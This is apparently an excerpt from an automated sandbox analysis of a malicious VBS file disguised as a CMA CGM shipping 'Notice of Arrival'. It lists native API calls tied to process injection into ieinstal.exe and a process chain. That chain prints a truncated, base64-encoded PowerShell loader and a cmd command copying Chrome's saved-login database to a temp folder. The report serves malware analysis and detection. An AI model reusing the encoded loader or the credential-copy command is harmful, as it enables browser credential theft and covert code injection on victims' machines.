      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E710EAD7_2_1E710EAD
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71FF637_2_1E71FF63
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66CF007_2_1E66CF00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E666FE07_2_1E666FE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E711FC67_2_1E711FC6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71EFBF7_2_1E71EFBF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E663C607_2_1E663C60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71EC607_2_1E71EC60
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E716C697_2_1E716C69
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70EC4C7_2_1E70EC4C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66AC207_2_1E66AC20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E650C127_2_1E650C12
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FCE07_2_1E67FCE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E72ACEB7_2_1E72ACEB
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E678CDF7_2_1E678CDF
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6F9C987_2_1E6F9C98
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660D697_2_1E660D69
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E717D4C7_2_1E717D4C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71FD277_2_1E71FD27
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65AD007_2_1E65AD00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FFDF47_2_1E6FFDF4
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E669DD07_2_1E669DD0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E672DB07_2_1E672DB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71EA5B7_2_1E71EA5B
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71CA137_2_1E71CA13
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67FAA07_2_1E67FAA0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71FA897_2_1E71FA89
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71FB2E7_2_1E71FB2E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E69DB197_2_1E69DB19
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E660B107_2_1E660B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D4BC07_2_1E6D4BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71F8727_2_1E71F872
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6468687_2_1E646868
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6698707_2_1E669870
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67B8707_2_1E67B870
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7008357_2_1E700835
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6638007_2_1E663800
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E68E8107_2_1E68E810
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7178F37_2_1E7178F3
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6628C07_2_1E6628C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7118DA7_2_1E7118DA
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D98B27_2_1E6D98B2
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6768827_2_1E676882
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6299E87_2_1E6299E8
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6A59C07_2_1E6A59C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65E9A07_2_1E65E9A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71E9A67_2_1E71E9A6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6846707_2_1E684670
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70D6467_2_1E70D646
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FD62C7_2_1E6FD62C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67C6007_2_1E67C600
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6D36EC7_2_1E6D36EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E65C6E07_2_1E65C6E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71F6F67_2_1E71F6F6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71A6C07_2_1E71A6C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6606807_2_1E660680
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6627607_2_1E662760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66A7607_2_1E66A760
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7167577_2_1E716757
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6217077_2_1E621707
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6604457_2_1E660445
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6CD4807_2_1E6CD480
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E72A5267_2_1E72A526
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7175C67_2_1E7175C6
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71F5C97_2_1E71F5C9
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6222457_2_1E622245
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71124C7_2_1E71124C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64D2EC7_2_1E64D2EC
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E71F3307_2_1E71F330
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66E3107_2_1E66E310
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6513807_2_1E651380
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E70E0767_2_1E70E076
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E7170F17_2_1E7170F1
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E66B0D07_2_1E66B0D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6500A07_2_1E6500A0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E69508C7_2_1E69508C
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6A717A7_2_1E6A717A
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6FD1307_2_1E6FD130
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E64F1137_2_1E64F113
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E72010E7_2_1E72010E
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E67B1E07_2_1E67B1E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6651C07_2_1E6651C0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E6DEF10 appears 105 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E64B910 appears 268 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E6A7BE4 appears 90 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E695050 appears 36 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: String function: 1E6CE692 appears 86 times
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692E50 NtCreateSection,LdrInitializeThunk,7_2_1E692E50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692ED0 NtResumeThread,LdrInitializeThunk,7_2_1E692ED0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692EB0 NtProtectVirtualMemory,LdrInitializeThunk,7_2_1E692EB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692F00 NtCreateFile,LdrInitializeThunk,7_2_1E692F00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692C50 NtUnmapViewOfSection,LdrInitializeThunk,7_2_1E692C50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692C30 NtMapViewOfSection,LdrInitializeThunk,7_2_1E692C30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692CF0 NtDelayExecution,LdrInitializeThunk,7_2_1E692CF0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692D10 NtQuerySystemInformation,LdrInitializeThunk,7_2_1E692D10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,7_2_1E692DC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692DA0 NtReadVirtualMemory,LdrInitializeThunk,7_2_1E692DA0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692B10 NtAllocateVirtualMemory,LdrInitializeThunk,7_2_1E692B10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692BC0 NtQueryInformationToken,LdrInitializeThunk,7_2_1E692BC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692B90 NtFreeVirtualMemory,LdrInitializeThunk,7_2_1E692B90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6929F0 NtReadFile,LdrInitializeThunk,7_2_1E6929F0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692E00 NtQueueApcThread,7_2_1E692E00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692EC0 NtQuerySection,7_2_1E692EC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692E80 NtCreateProcessEx,7_2_1E692E80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692F30 NtOpenDirectoryObject,7_2_1E692F30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692FB0 NtSetValueKey,7_2_1E692FB0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692C20 NtSetInformationFile,7_2_1E692C20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E693C30 NtOpenProcessToken,7_2_1E693C30
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692C10 NtOpenProcess,7_2_1E692C10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692CD0 NtEnumerateKey,7_2_1E692CD0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E693C90 NtOpenThread,7_2_1E693C90
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692D50 NtWriteVirtualMemory,7_2_1E692D50
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692A10 NtWriteFile,7_2_1E692A10
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692AC0 NtEnumerateValueKey,7_2_1E692AC0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692AA0 NtQueryInformationFile,7_2_1E692AA0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692A80 NtClose,7_2_1E692A80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692B20 NtQueryInformationProcess,7_2_1E692B20
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692B00 NtQueryValueKey,7_2_1E692B00
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692BE0 NtQueryVirtualMemory,7_2_1E692BE0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E692B80 NtCreateKey,7_2_1E692B80
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6938D0 NtGetContextThread,7_2_1E6938D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6929D0 NtWaitForSingleObject,7_2_1E6929D0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E6934E0 NtCreateMutant,7_2_1E6934E0
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E694570 NtSuspendThread,7_2_1E694570
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeCode function: 7_2_1E694260 NtSetContextThread,7_2_1E694260
      Source: NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbsInitial sample: Strings found which are bigger than 50
      Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
      Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exeSection loaded: edgegdi.dllJump to behavior
      Source: NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbsVirustotal: Detection: 10%
      Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\wscript.exe "C:\Users\user\Desktop\NOA_CMACGM_Notice_of_Arrival_ONEGO_BORA_0JH0JR1MA_1661088550291R021206.vbs"
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAHIAaABpAGQAIABBAGwAZgBnAHkAcABzACAAUgBpAGIAYQB6AHUAYgBhAGkAbgAgAEQAYQB5AGQAYQB3AG4AIABQAHIAYQBzACAAUwB1AGIAYw
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r0st5wfi\r0st5wfi.cmdline
      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESC6A9.tmp" "c:\Users\user\AppData\Local\Temp\r0st5wfi\CSC6C14E777B6F1436A823D509EAA82CA50.TMP"
      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe C:\Program Files (x86)\internet explorer\ieinstal.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\autoconv.exe C:\Windows\SysWOW64\autoconv.exe
      Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\wscript.exe C:\Windows\SysWOW64\wscript.exe
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Internet Explorer\ieinstal.exe "C:\Program Files (x86)\internet explorer\ieinstal.exe"
      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "IwBOAGEAdAB1AHIAZgBhAGcAZQBuACAAVAByAG8AcABoAG8AbgB1AGMAIABBAGMAaABvAG4AZAAgAEwAdQBmAHQAawB2AGEAbABpAHQAIABDAHkAYwBsACAAdABlAHQAYwBoAGUAZAB1AGQAIABQAGEAcgBhACAAUwB1AHAAcABsAGUAIABTAHUAYgB0AGkAdABsAGUAIABBAGMAYwBlAHMAcwAgAFAAYQByAGEAbAAgAE8AdgBlAHIAcABvAG4AIABnAHkAbgBlACAAUgBlAGQAZQBmAGkAbgBlACAATQBhAHQAZQByAGkAIABDAGgAYQBpAG4AbQBhAGsAaQBuACAAcwBwAGkAcgB1ACAATABlAHYAZQAgAHcAZQBmAHQAYQBnACAARgBvAHIAcwB5AG4AaQBuAGcAcwAgAEkAbgBkAHMAawB5AGQAbgBpAG4AIABUAHIAYQBuAG0AaQAgAFMAawByAGEAdgBlAHIAaQBuACAAVAB1AHIAbgAgAE0AYQBzAGsAaQBuACAAVABzAHQAcwBjAG8AIABBAHMAcwB1AG0AaQBuAGcAbAB5ACAATgBhAHQAdABlAHYAYQBuAGQAcgAgAFMAawBpAGwAIAANAAoAIwBBAGsAaQBuAGUAdABlAHQAZQAgAFUAbgBlAHgAcAAgAHAAaABvAHMAcABoAG8AcgAgAEYAbwByAGIAIABVAG4AYwBvAG4AdABpACAAUABsAGEAdAAgAEYAdQBuAGQAIABDAG8AbgBmAHUAYwBpAGEAbgAgAE0AZQBkAGEAbABqAGUAdgBpACAAUwBwAG8AcgBzAHQAIABEAGkAbwByAGEAbQBhAHMAawBuACAADQAKACMAQQBtAG4AaQAgAEwAbwB2AHIAZQB2AGkAcwBpAG8AIABoAGEAcgB0AGEAbAByAGUAZQAgAEsAbABiAHYAaQB0AHIAIABTAHQAZQBuAG8AYwBoAHIAIABTAGsAbwB2AHMAcAB1AHIAdgBlACAAQwBoAG8AbgBkAHIAbwAgAEgAdQBkAGcAZQBuACAAUAByAHUAdAB0AGUAbgByACAATQB5AHQAaABpAHMAZQAgAE8AbQBrAHIAcwAgAEEAcQB1AGkAYwB1AGwAdAAgAA0ACgAkAE0AYQBzAHQAZQByAE0AaQBuAGQAIAA9ACAAWwBjAGgAYQByAF0AMwA0ACAAKwAgACIATgAiACAAKwAgACIAdABBAGwAIgAgACsAIAAiAGwAbwBjACIAIAArACAAIgBhAHQAZQAiACsAIgBWAGkAIgAgACsAIAAiAHIAdAB1AGEAbAAiACAAKwAgACIATQBlAG0AbwByAHkAIgAgACsAIABbAGMAaABhAHIAXQAzADQADQAKAA0ACgAjAEUAbgBnAHIAbwBvAHYAZQAgAG0AZQBnAGEAbAAgAE4AbwBuAGYAIABUAHUAbgBpAG4AZwBzACAAUwBqAGwAZQBnAGwAYQBkAGwAaQAgAFMAYQBuAGsAdAAgAFAAYQBtAHAAZQByACAAUAByAGUAZABpAHMAcABhACAARQBwAGgAZQAgAEEAcgBtAGEAIABEAGUAaABvAHIAbgBpAG4AIABHAG8AcwBzAGkAcAAgAEIAdQBzAHQAbABlAHIAcwAgAE8AYgBpAHMAcABhAG4AdAAgAE4AbwBuAHAAYQBjAGkAIABBAHAAcABsAGkAYwBlAHIAIABGAGkAZABvAHMAdABlAHIAIABMAGkAbgBqACAASABvAG0AaQBjAHUAbAAgAFQAdgBpAHYAbAByAGEAYQAgAEIAaQBkAHIAYQAgAHUAZwBlAG4AcABvAGwAcwB0ACAAUwBrAGUAbQBhAGYAbwByAG0AIABIAGEAbAB2AGEAYgBlAG4AcAAgAEwAeQBzAGkAIABhAGwAdABlAHIAYwBhACAAWQBhAGwAZQBsAGEAYQBzAGIAbAAgAEUAbgBkAG8AZwBzAGEAYQBmAG8AIABDAGEAbABjAGkAbwBmAGUAcgAgAEoAbwBiAGIAZQBzAGsAcgBpACAAVABvAHIAZQByAGUAZQByAHUAIABSAGUAdAB0ACAAUABlAHIAbAAgAA0ACgAjAFUAZABzAGsAIABLAGEAdABhAHMAdAByAG8AZgBlACAASAB5AHAAZQByAG0AIABTAGsAeQB0AHMAaAAgAEEAZgB0AGEAbAB0ACAASABhAHYAZQAgAEIAdQB0AHQAZQByAGQAZQBqAHMAIABGAHIAYgBhACAAQwBhAHQAbwBwAHQAIABJAGcAbgBvAHIAYQBuAGMAZQAgAE8AdQB0AGIAdQBsACAATQBlAGwAYgBvAHUAIABNAGkAcwB0AGkAIABTAG0AZABlACAAVQBuAGwAbwBkACAATwB2AGUAbgAgAFIAZQBvAGIAcwBlACAATwBwAGIAcgAgAEIAcgBkAGQAZQBnACAASAB5AGQAYQB0AGkAZABvAGMAZQAgAEQAZQBuAHQAaQBmAHIAaQBjAGUAIABBAGMAcgBvACAASQBuAGUAeABwACAAUwBlAGsAcwBrACAAVQBuAGQAZQAgAEgAeQBwAGUAIABHAGkAZgB0AGUAawBuAGkAIABPAG0AZABvAGUAYgAgAFMAawBhAGUAcgBtACAATgBpAG4AZQB0AGUAZAB1ACAARQBkAGkAdABlACAATwBtAGsAbwBzAHQAIABTAGwAZABlAHIAcwAgAA0ACgAjAEQAZQBnAGUAbgBlAHIAIABIAHkAcABlAH